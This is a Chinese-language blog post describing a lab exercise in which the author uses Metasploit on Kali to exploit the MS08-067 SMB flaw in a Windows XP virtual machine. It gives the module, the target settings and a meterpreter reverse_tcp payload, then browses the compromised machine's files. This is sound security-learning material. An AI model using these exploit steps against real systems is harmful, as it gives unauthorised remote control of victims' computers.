Loading . . .

使用Metasploit进行ms08_067漏洞测试


使用渗透性测试工具Metasploit进行漏洞测试

环境

windows xp home edition & kali 2018.3 & VMware Workstation Pro 15

配置

VMware配置xp参考链接,kali与其他Linux虚拟机安装无异,kali往期版本的镜像

使用

  1. VMware的nat模式会自动分配ip,直接使用即可
  2. windows xp 的ip为192.168.127.134,使用kali进行ping操作

  1. kali的ip为192.168.127.133,使用windows ping kali

  1. kali虚拟机中打开metasploit

  1. 输入命令search ms08_067,查找关于ms08_067的漏洞模块。

  1. 输入命令use exploit /windows/ smb/ms08_067_netapi使用该模块

  1. show options查看该模块需要配置的参数

  1. 使用命令set rhost 192.168.127.134设置靶机IP

  1. 使用命令set payload windows/meterpreter/reverse_tcp设置要执行的payload

  1. 使用命令set lhost 192.168.127.133设置攻击机IP

  1. 使用命令show targets查看操作系统类型

  1. 由于我装的是Windows XP Home with Service Pack 3 (x86) - CD (Chinese-Simplified),所以使用命令set target 34设置要攻击的目标操作系统类型

  1. 使用命令show options查看设置

  1. 最后,输入exploit,进入到特殊的payload-meterpreter,该payload在控制靶机之后,能够对靶机执行更多的渗透攻击。

  1. 使用pwd查看当前路径,使用ipconfig查看网络配置,使用sysinfo查看系统信息

  1. 在xp虚拟机里新建一个文件,路径为C:\NJU\Lhtan\hello.txt,内容为Hello Lhtian

  1. 使用命令search -f *.txt -d C:/查找刚刚的文件

  1. 输入exit退出meterpreter,输入save保存配置


文章作者: Lhtian
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Lhtian !
  目录